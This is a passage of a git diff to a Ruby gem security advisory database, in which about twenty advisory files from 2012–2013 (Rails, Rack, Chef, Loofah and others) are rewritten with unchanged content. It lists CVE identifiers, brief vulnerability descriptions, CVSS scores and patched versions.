-    destroy, and update methods, which allows remote authenticated
-    users to manage user accounts via requests to the /users URI.
-  cvss_v2: 6.5
-  patched_versions:
-  - ">= 0.9.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2010-5142
-    - https://vuldb.com/?id.61514
-    - http://tickets.opscode.com/browse/CHEF-1289
-    - https://github.com/opscode/chef/commit/c3bb41f727fbe00e5de719d687757b24c8dcdfc8
-    - https://github.com/advisories/GHSA-f68m-q26r-64f6
----
+---
+layout: advisory
+title: 'CVE-2010-5142 (chef): Chef Improper Access Control Vulnerability'
+comments: false
+categories:
+- chef
+advisory:
+  gem: chef
+  cve: 2010-5142
+  ghsa: f68m-q26r-64f6
+  url: https://github.com/advisories/GHSA-f68m-q26r-64f6
+  title: Chef Improper Access Control Vulnerability
+  date: 2012-08-08
+  description: |
+    `chef-server-api/app/controllers/users.rb` in the API in Chef before
+    0.9.0 does not require administrative privileges for the create,
+    destroy, and update methods, which allows remote authenticated
+    users to manage user accounts via requests to the /users URI.
+  cvss_v2: 6.5
+  patched_versions:
+  - ">= 0.9.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2010-5142
+    - https://vuldb.com/?id.61514
+    - http://tickets.opscode.com/browse/CHEF-1289
+    - https://github.com/opscode/chef/commit/c3bb41f727fbe00e5de719d687757b24c8dcdfc8
+    - https://github.com/advisories/GHSA-f68m-q26r-64f6
+---
diff --git a/advisories/_posts/2012-08-09-CVE-2012-3463.md b/advisories/_posts/2012-08-09-CVE-2012-3463.md
index 2fcaa7a5..c935c302 100644
--- a/advisories/_posts/2012-08-09-CVE-2012-3463.md
+++ b/advisories/_posts/2012-08-09-CVE-2012-3463.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2012-3463 (actionpack): CVE-2012-3463 rubygem-actionpack: potential XSS
-  vulnerability in select_tag prompt'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2012-3463
-  osvdb: 84515
-  ghsa: 98mf-8f57-64qf
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-3463
-  title: 'CVE-2012-3463 rubygem-actionpack: potential XSS vulnerability in select_tag
-    prompt'
-  date: 2012-08-09
-  description: |
-    Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/form_tag_helper.rb
-    in Ruby on Rails 3.x before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 allows
-    remote attackers to inject arbitrary web script or HTML via the prompt field to
-    the select_tag helper.
-  cvss_v2: 4.3
-  unaffected_versions:
-  - "~> 2.3.0"
-  patched_versions:
-  - "~> 3.0.17"
-  - "~> 3.1.8"
-  - ">= 3.2.8"
----
+---
+layout: advisory
+title: 'CVE-2012-3463 (actionpack): CVE-2012-3463 rubygem-actionpack: potential XSS
+  vulnerability in select_tag prompt'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2012-3463
+  osvdb: 84515
+  ghsa: 98mf-8f57-64qf
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-3463
+  title: 'CVE-2012-3463 rubygem-actionpack: potential XSS vulnerability in select_tag
+    prompt'
+  date: 2012-08-09
+  description: |
+    Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/form_tag_helper.rb
+    in Ruby on Rails 3.x before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 allows
+    remote attackers to inject arbitrary web script or HTML via the prompt field to
+    the select_tag helper.
+  cvss_v2: 4.3
+  unaffected_versions:
+  - "~> 2.3.0"
+  patched_versions:
+  - "~> 3.0.17"
+  - "~> 3.1.8"
+  - ">= 3.2.8"
+---
diff --git a/advisories/_posts/2012-08-09-CVE-2012-3464.md b/advisories/_posts/2012-08-09-CVE-2012-3464.md
index 846d1fd4..9b85c039 100644
--- a/advisories/_posts/2012-08-09-CVE-2012-3464.md
+++ b/advisories/_posts/2012-08-09-CVE-2012-3464.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2012-3464 (activesupport): CVE-2012-3464 rubygem-actionpack: potential
-  XSS vulnerability'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2012-3464
-  osvdb: 84516
-  ghsa: h835-75hw-pj89
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-3464
-  title: 'CVE-2012-3464 rubygem-actionpack: potential XSS vulnerability'
-  date: 2012-08-09
-  description: |
-    Cross-site scripting (XSS) vulnerability in activesupport/lib/active_support/core_ext/string/output_safety.rb
-    in Ruby on Rails before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 might
-    allow remote attackers to inject arbitrary web script or HTML via vectors involving
-    a ' (quote) character.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 3.0.17"
-  - "~> 3.1.8"
-  - ">= 3.2.8"
----
+---
+layout: advisory
+title: 'CVE-2012-3464 (activesupport): CVE-2012-3464 rubygem-actionpack: potential
+  XSS vulnerability'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2012-3464
+  osvdb: 84516
+  ghsa: h835-75hw-pj89
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-3464
+  title: 'CVE-2012-3464 rubygem-actionpack: potential XSS vulnerability'
+  date: 2012-08-09
+  description: |
+    Cross-site scripting (XSS) vulnerability in activesupport/lib/active_support/core_ext/string/output_safety.rb
+    in Ruby on Rails before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 might
+    allow remote attackers to inject arbitrary web script or HTML via vectors involving
+    a ' (quote) character.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 3.0.17"
+  - "~> 3.1.8"
+  - ">= 3.2.8"
+---
diff --git a/advisories/_posts/2012-08-09-CVE-2012-3465.md b/advisories/_posts/2012-08-09-CVE-2012-3465.md
index 804174e8..30cd7d39 100644
--- a/advisories/_posts/2012-08-09-CVE-2012-3465.md
+++ b/advisories/_posts/2012-08-09-CVE-2012-3465.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2012-3465 (actionpack): CVE-2012-3465 rubygem-actionpack: XSS Vulnerability
-  in strip_tags'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2012-3465
-  osvdb: 84513
-  ghsa: 7g65-ghrg-hpf5
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-3465
-  title: 'CVE-2012-3465 rubygem-actionpack: XSS Vulnerability in strip_tags'
-  date: 2012-08-09
-  description: |
-    Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/sanitize_helper.rb
-    in the strip_tags helper in Ruby on Rails before 3.0.17, 3.1.x before 3.1.8, and
-    3.2.x before 3.2.8 allows remote attackers to inject arbitrary web script or HTML
-    via malformed HTML markup.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 3.0.17"
-  - "~> 3.1.8"
-  - ">= 3.2.8"
----
+---
+layout: advisory
+title: 'CVE-2012-3465 (actionpack): CVE-2012-3465 rubygem-actionpack: XSS Vulnerability
+  in strip_tags'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2012-3465
+  osvdb: 84513
+  ghsa: 7g65-ghrg-hpf5
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-3465
+  title: 'CVE-2012-3465 rubygem-actionpack: XSS Vulnerability in strip_tags'
+  date: 2012-08-09
+  description: |
+    Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/sanitize_helper.rb
+    in the strip_tags helper in Ruby on Rails before 3.0.17, 3.1.x before 3.1.8, and
+    3.2.x before 3.2.8 allows remote attackers to inject arbitrary web script or HTML
+    via malformed HTML markup.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 3.0.17"
+  - "~> 3.1.8"
+  - ">= 3.2.8"
+---
diff --git a/advisories/_posts/2012-09-08-CVE-2012-6134.md b/advisories/_posts/2012-09-08-CVE-2012-6134.md
index 6f7eba59..37da735d 100644
--- a/advisories/_posts/2012-09-08-CVE-2012-6134.md
+++ b/advisories/_posts/2012-09-08-CVE-2012-6134.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2012-6134 (omniauth-oauth2): Ruby on Rails omniauth-oauth2 Gem CSRF vulnerability'
-comments: false
-categories:
-- omniauth-oauth2
-advisory:
-  gem: omniauth-oauth2
-  cve: 2012-6134
-  osvdb: 90264
-  ghsa: fgmx-8h93-26fh
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-6134
-  title: Ruby on Rails omniauth-oauth2 Gem CSRF vulnerability
-  date: 2012-09-08
-  description: |
-    The omniauth-oauth2 Ruby Gem contains a flaw that allows an attacker to
-    inject values into a user's session through a CSRF attack.
-  cvss_v2: 6.8
-  patched_versions:
-  - ">= 1.1.1"
----
+---
+layout: advisory
+title: 'CVE-2012-6134 (omniauth-oauth2): Ruby on Rails omniauth-oauth2 Gem CSRF vulnerability'
+comments: false
+categories:
+- omniauth-oauth2
+advisory:
+  gem: omniauth-oauth2
+  cve: 2012-6134
+  osvdb: 90264
+  ghsa: fgmx-8h93-26fh
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-6134
+  title: Ruby on Rails omniauth-oauth2 Gem CSRF vulnerability
+  date: 2012-09-08
+  description: |
+    The omniauth-oauth2 Ruby Gem contains a flaw that allows an attacker to
+    inject values into a user's session through a CSRF attack.
+  cvss_v2: 6.8
+  patched_versions:
+  - ">= 1.1.1"
+---
diff --git a/advisories/_posts/2012-09-08-OSVDB-90945.md b/advisories/_posts/2012-09-08-OSVDB-90945.md
index cd7f6427..7d25884b 100644
--- a/advisories/_posts/2012-09-08-OSVDB-90945.md
+++ b/advisories/_posts/2012-09-08-OSVDB-90945.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'OSVDB-90945 (loofah): Loofah HTML and XSS injection vulnerability'
-comments: false
-categories:
-- loofah
-advisory:
-  gem: loofah
-  osvdb: 90945
-  url: https://security.snyk.io/vuln/SNYK-RUBY-LOOFAH-20039
-  title: Loofah HTML and XSS injection vulnerability
-  date: 2012-09-08
-  description: |
-    Loofah Gem for Ruby contains a flaw that allows a remote cross-site
-    scripting (XSS) attack. This flaw exists because the
-    Loofah::HTML::Document\#text function passes properly sanitized
-    user-supplied input to the Loofah::XssFoliate and
-    Loofah::Helpers\#strip_tags functions which convert input back to
-    text. This may allow an attacker to create a specially crafted
-    request that would execute arbitrary script code in a user's browser
-    within the trust relationship between their browser and the server.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 0.4.6"
-  related:
-    url:
-    - https://github.com/flavorjones/loofah/compare/v0.4.5...v0.4.6
-    - https://security.snyk.io/vuln/SNYK-RUBY-LOOFAH-20039
-    - https://www.versioneye.com/Ruby/loofah/0.4.2
-    - https://www.mend.io/vulnerability-database/WS-2012-0023
-    - http://www.osvdb.org/show/osvdb/90945
----
+---
+layout: advisory
+title: 'OSVDB-90945 (loofah): Loofah HTML and XSS injection vulnerability'
+comments: false
+categories:
+- loofah
+advisory:
+  gem: loofah
+  osvdb: 90945
+  url: https://security.snyk.io/vuln/SNYK-RUBY-LOOFAH-20039
+  title: Loofah HTML and XSS injection vulnerability
+  date: 2012-09-08
+  description: |
+    Loofah Gem for Ruby contains a flaw that allows a remote cross-site
+    scripting (XSS) attack. This flaw exists because the
+    Loofah::HTML::Document\#text function passes properly sanitized
+    user-supplied input to the Loofah::XssFoliate and
+    Loofah::Helpers\#strip_tags functions which convert input back to
+    text. This may allow an attacker to create a specially crafted
+    request that would execute arbitrary script code in a user's browser
+    within the trust relationship between their browser and the server.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 0.4.6"
+  related:
+    url:
+    - https://github.com/flavorjones/loofah/compare/v0.4.5...v0.4.6
+    - https://security.snyk.io/vuln/SNYK-RUBY-LOOFAH-20039
+    - https://www.versioneye.com/Ruby/loofah/0.4.2
+    - https://www.mend.io/vulnerability-database/WS-2012-0023
+    - http://www.osvdb.org/show/osvdb/90945
+---
diff --git a/advisories/_posts/2012-09-25-CVE-2012-2125.md b/advisories/_posts/2012-09-25-CVE-2012-2125.md
index 733853ef..2a290230 100644
--- a/advisories/_posts/2012-09-25-CVE-2012-2125.md
+++ b/advisories/_posts/2012-09-25-CVE-2012-2125.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2012-2125 (rubygems-update): CVE-2012-2125 CVE-2012-2126 rubygems: Two
-  security fixes in v1.8.23'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2012-2125
-  osvdb: 85809
-  ghsa: 228f-g3h7-3fj3
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2125
-  title: 'CVE-2012-2125 CVE-2012-2126 rubygems: Two security fixes in v1.8.23'
-  date: 2012-09-25
-  description: |
-    RubyGems before 1.8.23 can redirect HTTPS connections to HTTP, which
-    makes it easier for remote attackers to observe or modify a gem during
-    installation via a man-in-the-middle attack.
-  cvss_v2: 5.8
-  patched_versions:
-  - ">= 1.8.23"
----
+---
+layout: advisory
+title: 'CVE-2012-2125 (rubygems-update): CVE-2012-2125 CVE-2012-2126 rubygems: Two
+  security fixes in v1.8.23'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2012-2125
+  osvdb: 85809
+  ghsa: 228f-g3h7-3fj3
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2125
+  title: 'CVE-2012-2125 CVE-2012-2126 rubygems: Two security fixes in v1.8.23'
+  date: 2012-09-25
+  description: |
+    RubyGems before 1.8.23 can redirect HTTPS connections to HTTP, which
+    makes it easier for remote attackers to observe or modify a gem during
+    installation via a man-in-the-middle attack.
+  cvss_v2: 5.8
+  patched_versions:
+  - ">= 1.8.23"
+---
diff --git a/advisories/_posts/2012-12-04-CVE-2012-5604.md b/advisories/_posts/2012-12-04-CVE-2012-5604.md
index 7ebdfeac..dd0b57c1 100644
--- a/advisories/_posts/2012-12-04-CVE-2012-5604.md
+++ b/advisories/_posts/2012-12-04-CVE-2012-5604.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2012-5604 (ldap_fluff): CVE-2012-5604 rubygem-ldap_fluff: CloudForms authentication
-  bypass when handling anonymous LDAP bind'
-comments: false
-categories:
-- ldap_fluff
-advisory:
-  gem: ldap_fluff
-  cve: 2012-5604
-  osvdb: 90579
-  ghsa: 9whh-582r-589h
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-5604
-  title: 'CVE-2012-5604 rubygem-ldap_fluff: CloudForms authentication bypass when
-    handling anonymous LDAP bind'
-  date: 2012-12-04
-  description: |
-    The ldap_fluff gem for Ruby, as used in Red Hat CloudForms 1.1, when
-    using Active Directory for authentication, allows remote attackers to bypass authentication
-    via unspecified vectors.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 0.1.3"
----
+---
+layout: advisory
+title: 'CVE-2012-5604 (ldap_fluff): CVE-2012-5604 rubygem-ldap_fluff: CloudForms authentication
+  bypass when handling anonymous LDAP bind'
+comments: false
+categories:
+- ldap_fluff
+advisory:
+  gem: ldap_fluff
+  cve: 2012-5604
+  osvdb: 90579
+  ghsa: 9whh-582r-589h
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-5604
+  title: 'CVE-2012-5604 rubygem-ldap_fluff: CloudForms authentication bypass when
+    handling anonymous LDAP bind'
+  date: 2012-12-04
+  description: |
+    The ldap_fluff gem for Ruby, as used in Red Hat CloudForms 1.1, when
+    using Active Directory for authentication, allows remote attackers to bypass authentication
+    via unspecified vectors.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 0.1.3"
+---
diff --git a/advisories/_posts/2012-12-06-CVE-2013-0284.md b/advisories/_posts/2012-12-06-CVE-2013-0284.md
index 68538139..c9b80fb1 100644
--- a/advisories/_posts/2012-12-06-CVE-2013-0284.md
+++ b/advisories/_posts/2012-12-06-CVE-2013-0284.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-0284 (newrelic_rpm): Ruby on Rails newrelic_rpm Gem Discloses Sensitive
-  Information'
-comments: false
-categories:
-- newrelic_rpm
-advisory:
-  gem: newrelic_rpm
-  cve: 2013-0284
-  osvdb: 90189
-  ghsa: q6cw-2553-7837
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0284
-  title: Ruby on Rails newrelic_rpm Gem Discloses Sensitive Information
-  date: 2012-12-06
-  description: |
-    A bug in the Ruby agent causes database connection information and raw SQL
-    statements to be transmitted to New Relic servers. The database connection
-    information includes the database IP address, username, and password
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 3.5.3.25"
----
+---
+layout: advisory
+title: 'CVE-2013-0284 (newrelic_rpm): Ruby on Rails newrelic_rpm Gem Discloses Sensitive
+  Information'
+comments: false
+categories:
+- newrelic_rpm
+advisory:
+  gem: newrelic_rpm
+  cve: 2013-0284
+  osvdb: 90189
+  ghsa: q6cw-2553-7837
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0284
+  title: Ruby on Rails newrelic_rpm Gem Discloses Sensitive Information
+  date: 2012-12-06
+  description: |
+    A bug in the Ruby agent causes database connection information and raw SQL
+    statements to be transmitted to New Relic servers. The database connection
+    information includes the database IP address, username, and password
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 3.5.3.25"
+---
diff --git a/advisories/_posts/2012-12-21-CVE-2012-6497.md b/advisories/_posts/2012-12-21-CVE-2012-6497.md
index ef018048..788a6979 100644
--- a/advisories/_posts/2012-12-21-CVE-2012-6497.md
+++ b/advisories/_posts/2012-12-21-CVE-2012-6497.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2012-6497 (authlogic): Ruby on Rails Authlogic Gem secret_token.rb Known
-  secret_token Value Weakness'
-comments: false
-categories:
-- authlogic
-advisory:
-  gem: authlogic
-  cve: 2012-6497
-  osvdb: 89064
-  ghsa: rx7j-mw4c-76g9
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-6497
-  title: Ruby on Rails Authlogic Gem secret_token.rb Known secret_token Value Weakness
-  date: 2012-12-21
-  description: |
-    Ruby on Rails contains a flaw in the Authlogic gem. The issue is triggered
-    when the program makes an unsafe method call for find_by_id. With a specially
-    crafted parameter in an environment that knows the secret_token value in
-    secret_token.rb, a remote attacker to more easily conduct SQL injection
-    attacks.
-  patched_versions:
-  - ">= 3.3.0"
----
+---
+layout: advisory
+title: 'CVE-2012-6497 (authlogic): Ruby on Rails Authlogic Gem secret_token.rb Known
+  secret_token Value Weakness'
+comments: false
+categories:
+- authlogic
+advisory:
+  gem: authlogic
+  cve: 2012-6497
+  osvdb: 89064
+  ghsa: rx7j-mw4c-76g9
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-6497
+  title: Ruby on Rails Authlogic Gem secret_token.rb Known secret_token Value Weakness
+  date: 2012-12-21
+  description: |
+    Ruby on Rails contains a flaw in the Authlogic gem. The issue is triggered
+    when the program makes an unsafe method call for find_by_id. With a specially
+    crafted parameter in an environment that knows the secret_token value in
+    secret_token.rb, a remote attacker to more easily conduct SQL injection
+    attacks.
+  patched_versions:
+  - ">= 3.3.0"
+---
diff --git a/advisories/_posts/2012-12-22-CVE-2012-6496.md b/advisories/_posts/2012-12-22-CVE-2012-6496.md
index c4ab0d55..37d69cc9 100644
--- a/advisories/_posts/2012-12-22-CVE-2012-6496.md
+++ b/advisories/_posts/2012-12-22-CVE-2012-6496.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2012-6496 (activerecord): Ruby on Rails find_by_* Methods Authlogic SQL
-  Injection Bypass'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2012-6496
-  osvdb: 88661
-  ghsa: gh2w-j7cx-2664
-  url: https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/DCNTNp_qjFM
-  title: Ruby on Rails find_by_* Methods Authlogic SQL Injection Bypass
-  date: 2012-12-22
-  description: |
-    Due to the way dynamic finders in Active Record extract options from method
-    parameters, a method parameter can mistakenly be used as a scope.  Carefully
-    crafted requests can use the scope to inject arbitrary SQL.
-  cvss_v2: 6.4
-  patched_versions:
-  - "~> 3.0.18"
-  - "~> 3.1.9"
-  - ">= 3.2.10"
----
+---
+layout: advisory
+title: 'CVE-2012-6496 (activerecord): Ruby on Rails find_by_* Methods Authlogic SQL
+  Injection Bypass'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2012-6496
+  osvdb: 88661
+  ghsa: gh2w-j7cx-2664
+  url: https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/DCNTNp_qjFM
+  title: Ruby on Rails find_by_* Methods Authlogic SQL Injection Bypass
+  date: 2012-12-22
+  description: |
+    Due to the way dynamic finders in Active Record extract options from method
+    parameters, a method parameter can mistakenly be used as a scope.  Carefully
+    crafted requests can use the scope to inject arbitrary SQL.
+  cvss_v2: 6.4
+  patched_versions:
+  - "~> 3.0.18"
+  - "~> 3.1.9"
+  - ">= 3.2.10"
+---
diff --git a/advisories/_posts/2013-01-07-CVE-2013-0183.md b/advisories/_posts/2013-01-07-CVE-2013-0183.md
index 580d306b..b2ead779 100644
--- a/advisories/_posts/2013-01-07-CVE-2013-0183.md
+++ b/advisories/_posts/2013-01-07-CVE-2013-0183.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-0183 (rack): CVE-2013-0183 rubygem-rack: receiving excessively long
-  lines triggers out-of-memory error'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2013-0183
-  osvdb: 89320
-  ghsa: 3pxh-h8hw-mj8w
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0183
-  title: 'CVE-2013-0183 rubygem-rack: receiving excessively long lines triggers out-of-memory
-    error'
-  date: 2013-01-07
-  description: |
-    multipart/parser.rb in Rack 1.3.x before 1.3.8 and 1.4.x before 1.4.3
-    allows remote attackers to cause a denial of service (memory consumption and out-of-memory
-    error) via a long string in a Multipart HTTP packet.
-  cvss_v2: 5.0
-  patched_versions:
-  - "~> 1.3.8"
-  - ">= 1.4.3"
----
+---
+layout: advisory
+title: 'CVE-2013-0183 (rack): CVE-2013-0183 rubygem-rack: receiving excessively long
+  lines triggers out-of-memory error'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2013-0183
+  osvdb: 89320
+  ghsa: 3pxh-h8hw-mj8w
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0183
+  title: 'CVE-2013-0183 rubygem-rack: receiving excessively long lines triggers out-of-memory
+    error'
+  date: 2013-01-07
+  description: |
+    multipart/parser.rb in Rack 1.3.x before 1.3.8 and 1.4.x before 1.4.3
+    allows remote attackers to cause a denial of service (memory consumption and out-of-memory
+    error) via a long string in a Multipart HTTP packet.
+  cvss_v2: 5.0
+  patched_versions:
+  - "~> 1.3.8"
+  - ">= 1.4.3"
+---
diff --git a/advisories/_posts/2013-01-08-CVE-2013-0155.md b/advisories/_posts/2013-01-08-CVE-2013-0155.md
index 6bb5c252..18f20d8f 100644
--- a/advisories/_posts/2013-01-08-CVE-2013-0155.md
+++ b/advisories/_posts/2013-01-08-CVE-2013-0155.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2013-0155 (activerecord): CVE-2013-0155 rubygem-actionpack, rubygem-activerecord:
-  Unsafe Query Generation Risk in Ruby on Rails'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2013-0155
-  osvdb: 89025
-  ghsa: gppp-5xc5-wfpx
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0155
-  title: 'CVE-2013-0155 rubygem-actionpack, rubygem-activerecord: Unsafe Query Generation
-    Risk in Ruby on Rails'
-  date: 2013-01-08
-  description: |
-    Ruby on Rails 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before
-    3.2.11 does not properly consider differences in parameter handling between the
-    Active Record component and the JSON implementation, which allows remote attackers
-    to bypass intended database-query restrictions and perform NULL checks or trigger
-    missing WHERE clauses via a crafted request, as demonstrated by certain "[nil]"
-    values, a related issue to CVE-2012-2660 and CVE-2012-2694.
-  cvss_v2: 10.0
-  patched_versions:
-  - "~> 2.3.16"
-  - "~> 3.0.19"
-  - "~> 3.1.10"
-  - ">= 3.2.11"
----
+---
+layout: advisory
+title: 'CVE-2013-0155 (activerecord): CVE-2013-0155 rubygem-actionpack, rubygem-activerecord:
+  Unsafe Query Generation Risk in Ruby on Rails'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2013-0155
+  osvdb: 89025
+  ghsa: gppp-5xc5-wfpx
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0155
+  title: 'CVE-2013-0155 rubygem-actionpack, rubygem-activerecord: Unsafe Query Generation
+    Risk in Ruby on Rails'
+  date: 2013-01-08
+  description: |
+    Ruby on Rails 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before
+    3.2.11 does not properly consider differences in parameter handling between the
+    Active Record component and the JSON implementation, which allows remote attackers
+    to bypass intended database-query restrictions and perform NULL checks or trigger
+    missing WHERE clauses via a crafted request, as demonstrated by certain "[nil]"
+    values, a related issue to CVE-2012-2660 and CVE-2012-2694.
+  cvss_v2: 10.0
+  patched_versions:
+  - "~> 2.3.16"
+  - "~> 3.0.19"
+  - "~> 3.1.10"
+  - ">= 3.2.11"
+---
diff --git a/advisories/_posts/2013-01-08-CVE-2013-0156.md b/advisories/_posts/2013-01-08-CVE-2013-0156.md
index 44b9c004..feead995 100644
--- a/advisories/_posts/2013-01-08-CVE-2013-0156.md
+++ b/advisories/_posts/2013-01-08-CVE-2013-0156.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2013-0156 (actionpack): CVE-2013-0156 rubygem-activesupport: Multiple
-  vulnerabilities in parameter parsing in ActionPack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2013-0156
-  osvdb: 89026
-  ghsa: jmgw-6vjg-jjwg
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0156
-  title: 'CVE-2013-0156 rubygem-activesupport: Multiple vulnerabilities in parameter
-    parsing in ActionPack'
-  date: 2013-01-08
-  description: |
-    active_support/core_ext/hash/conversions.rb in Ruby on Rails before 2.3.15,
-    3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly
-    restrict casts of string values, which allows remote attackers to conduct object-injection
-    attacks and execute arbitrary code, or cause a denial of service (memory and CPU
-    consumption) involving nested XML entity references, by leveraging Action Pack support
-    for (1) YAML type conversion or (2) Symbol type conversion.
-  cvss_v2: 10.0
-  patched_versions:
-  - "~> 2.3.15"
-  - "~> 3.0.19"
-  - "~> 3.1.10"
-  - ">= 3.2.11"
----
+---
+layout: advisory
+title: 'CVE-2013-0156 (actionpack): CVE-2013-0156 rubygem-activesupport: Multiple
+  vulnerabilities in parameter parsing in ActionPack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2013-0156
+  osvdb: 89026
+  ghsa: jmgw-6vjg-jjwg
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-0156
+  title: 'CVE-2013-0156 rubygem-activesupport: Multiple vulnerabilities in parameter
+    parsing in ActionPack'
+  date: 2013-01-08
+  description: |
+    active_support/core_ext/hash/conversions.rb in Ruby on Rails before 2.3.15,
+    3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly
+    restrict casts of string values, which allows remote attackers to conduct object-injection
+    attacks and execute arbitrary code, or cause a denial of service (memory and CPU
+    consumption) involving nested XML entity references, by leveraging Action Pack support
+    for (1) YAML type conversion or (2) Symbol type conversion.
+  cvss_v2: 10.0
+  patched_versions:
+  - "~> 2.3.15"
+  - "~> 3.0.19"
+  - "~> 3.1.10"
+  - ">= 3.2.11"
+---
diff --git a/advisories/_posts/2013-01-08-CVE-2013-1802.md b/advisories/_posts/2013-01-08-CVE-2013-1802.md
index f5166b32..cc864f4c 100644
--- a/advisories/_posts/2013-01-08-CVE-2013-1802.md
+++ b/advisories/_posts/2013-01-08-CVE-2013-1802.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-1802 (extlib): extlib Gem for Ruby Type Casting Parameter Parsing
-  Remote Code Execution'
-comments: false
-categories:
-- extlib
-advisory:
-  gem: extlib
-  cve: 2013-1802
-  osvdb: 90740
-  ghsa: 9h36-4jf2-hx53
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1802
-  title: extlib Gem for Ruby Type Casting Parameter Parsing Remote Code Execution
-  date: 2013-01-08
-  description: |
-    extlib Gem for Ruby contains a flaw that is triggered when a type casting
-    error occurs during the parsing of parameters. This may allow a
-    context-dependent attacker to potentially execute arbitrary code.
-  cvss_v2: 9.3
-  patched_versions:
-  - ">= 0.9.16"
----
+---
+layout: advisory
+title: 'CVE-2013-1802 (extlib): extlib Gem for Ruby Type Casting Parameter Parsing
+  Remote Code Execution'
+comments: false
+categories:
+- extlib
+advisory:
+  gem: extlib
+  cve: 2013-1802
+  osvdb: 90740
+  ghsa: 9h36-4jf2-hx53
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1802
